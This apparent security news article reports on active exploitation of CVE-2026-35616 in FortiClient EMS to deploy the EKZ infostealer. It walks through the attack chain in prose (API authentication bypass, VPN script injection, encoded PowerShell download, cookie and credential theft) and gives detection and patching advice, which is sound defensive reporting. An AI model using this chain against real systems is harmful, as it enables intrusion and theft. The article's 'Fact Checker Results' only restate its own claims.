Listen to this Post
Introduction
A newly discovered and actively exploited security flaw in FortiClient Enterprise Management Server (EMS) has triggered urgent warnings across the cybersecurity community. Tracked as CVE-2026-35616, the vulnerability allows unauthenticated attackers to bypass authentication and execute remote commands, turning enterprise VPN and endpoint management infrastructure into a silent delivery channel for malware. What makes this case especially dangerous is the abuse of trusted Fortinet workflows to deploy a stealth credential stealer known as EKZ, blending malicious activity with legitimate system behavior.
Summary of the Original Incident
Hackers are actively exploiting an authentication bypass vulnerability identified as CVE-2026-35616 in FortiClient EMS, a central management platform used to control Fortinet endpoint security agents.
The flaw is classified as an improper access control issue that enables unauthenticated remote attackers to execute arbitrary code or system commands through specially crafted requests.
Attackers have weaponized this vulnerability to deploy an undocumented infostealer known as EKZ, disguising it as a legitimate Fortinet endpoint update.
The attack chain begins with abuse of endpoint APIs that allow administrative-level actions without requiring authentication.
Once inside, attackers modify EMS configurations and VPN policies to inject malicious scripting logic into trusted workflows.
The malware execution is triggered when endpoints establish IPsec VPN tunnels to FortiGate firewalls, activating legitimate FortiClient components like fortitray.exe.
These components silently launch batch scripts via Command Prompt, which then execute encoded PowerShell commands.
The PowerShell payload downloads the EKZ infostealer, disguised as a Fortinet security patch, from attacker-controlled infrastructure.
The malware then runs silently, harvesting sensitive data such as browser credentials, cookies, and autofill information.
It targets both Chromium-based browsers and Firefox, extracting stored authentication data even from protected password stores.
The stolen information includes credentials, credit card details, addresses, and phone numbers.
It also collects session cookies, potentially bypassing multi-factor authentication protections.
Data exfiltration occurs over HTTP to a remote VPS controlled by the attackers.
Fortinet confirmed active exploitation in early April and released emergency patches for versions 7.4.5 and 7.4.6.
CISA issued urgent guidance requiring federal agencies to secure affected systems within a short timeframe.
At the same time, The Shadowserver Foundation reported more than 2,000 internet-exposed EMS instances.
Security firm Arctic Wolf later confirmed real-world exploitation campaigns deploying EKZ infostealer.
Researchers observed that attackers first manipulate endpoint APIs to gain unauthorized administrative capabilities.
They then alter VPN profiles and remote access configurations to ensure persistence and execution.
Log analysis revealed repeated anomalies such as missing certificate headers during authentication attempts.
This was often followed by successful updates referencing Fortinet certificate authorities.
Arctic Wolf recommends monitoring certificate-based authentication anomalies as early indicators of compromise.
Additional red flags include unfamiliar logins from Tor exit nodes or VPS-based IP addresses.
Unexpected creation of accounts or changes in remote access profiles should also be treated as high-risk indicators.
The campaign highlights how trusted enterprise management systems can be transformed into malware delivery pipelines.
EKZ itself functions as a standard infostealer but gains power through its privileged execution context.
The abuse of VPN scripting workflows allows attackers to blend malicious activity into normal administrative operations.
This makes detection significantly harder for traditional endpoint protection tools.
Security teams are advised to prioritize EMS patching and audit all administrative API access logs.
The incident underscores the growing trend of supply-chain-like attacks targeting management infrastructure itself.
What Undercode Say:
The exploitation of CVE-2026-35616 represents a shift in attacker strategy toward abusing trust boundaries inside enterprise management platforms.
Instead of relying on phishing or direct endpoint compromise, attackers are targeting centralized systems that already hold administrative control over thousands of endpoints.
FortiClient EMS becomes an especially attractive target because it bridges endpoint security, VPN access, and centralized policy management.
Once compromised, it effectively becomes a command hub for deploying malware at scale without triggering traditional endpoint alerts.
The use of authentication bypass removes the need for credential theft in the early stages of the attack chain.
This significantly lowers the barrier for attackers and increases automation potential in large-scale campaigns.
The integration of VPN scripting workflows is particularly dangerous because it blends malicious execution with expected enterprise behavior.
Security tools that rely on behavioral baselines may fail to distinguish legitimate FortiClient operations from malicious modifications.
The EKZ infostealer itself is not novel in capability, but its delivery mechanism is highly sophisticated.
By leveraging encoded PowerShell payloads, attackers avoid signature-based detection in many environments.
The use of base64 encoding and trusted Windows utilities like PowerShell and CMD demonstrates a classic living-off-the-land technique.
What elevates this threat is the timing-based execution triggered by VPN tunnel establishment events.
This allows malware activation to appear as a side effect of normal user or system activity.
The abuse of certificate-based authentication logs shows attackers are also attempting to manipulate trust signals within EMS.
Security teams must therefore focus not only on endpoint detection but also on management-layer telemetry.
Log anomalies such as unexpected certificate updates should be treated as early intrusion signals.
The Shadowserver report of 2,000 exposed EMS instances highlights a significant global attack surface.
Even a small exploitation rate could lead to widespread credential harvesting across enterprises.
Arctic Wolf’s findings reinforce that this is an active and ongoing campaign rather than a theoretical risk.
The most critical weakness here is not just the vulnerability itself but the architectural trust placed in EMS systems.
Once compromised, EMS effectively becomes a privileged execution environment across all managed endpoints.
This creates a cascading risk model where one breach can propagate laterally at administrative speed.
Defenders must assume that any exposed EMS instance is a high-priority target.
Immediate patching combined with strict network exposure reduction is essential.
Organizations should also segment EMS infrastructure from broader network access.
Monitoring should extend beyond endpoint antivirus into VPN behavior and administrative API usage.
Attackers are clearly optimizing for stealth rather than speed in this campaign.
The EKZ deployment shows careful orchestration designed to delay detection as long as possible.
This indicates a mature threat actor with understanding of enterprise security workflows.
The broader implication is that enterprise management platforms are now frontline attack surfaces.
Security strategy must evolve to treat them as critical infrastructure rather than supporting tools.
Fact Checker Results
✔ CVE-2026-35616 is described as an authentication bypass affecting FortiClient EMS and enabling remote code execution risk.
✔ Arctic Wolf and Fortinet reports confirm active exploitation and deployment of credential-stealing malware EKZ.
✔ CISA advisories and Shadowserver exposure data align with urgent patching and widespread internet-facing EMS systems.
Prediction
The exploitation of EMS platforms will likely increase as attackers prioritize centralized management systems over individual endpoints.
Future campaigns may expand EKZ-like tools into modular infostealers combined with ransomware staging components.
Enterprise VPN and endpoint management servers will become primary targets for stealth-based intrusion campaigns in 2026 and beyond.
🕵️📝Let’s dive deep and fact‑check.
References:
Reported By: www.bleepingcomputer.com
Extra Source Hub (Possible Sources for article):
https://www.digitaltrends.com
Wikipedia
OpenAi & Undercode AI
Image Source:
Unsplash
Undercode AI DI v2
Bing
🎓 Live Courses & Certifications:
Join Undercode Academy for Verified Certifications
🚀 Request a Custom Project:
Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]
📢 Follow UndercodeNews & Stay Tuned:
𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin | 🦋BlueSky | 🐘Mastodon | 📺Youtube
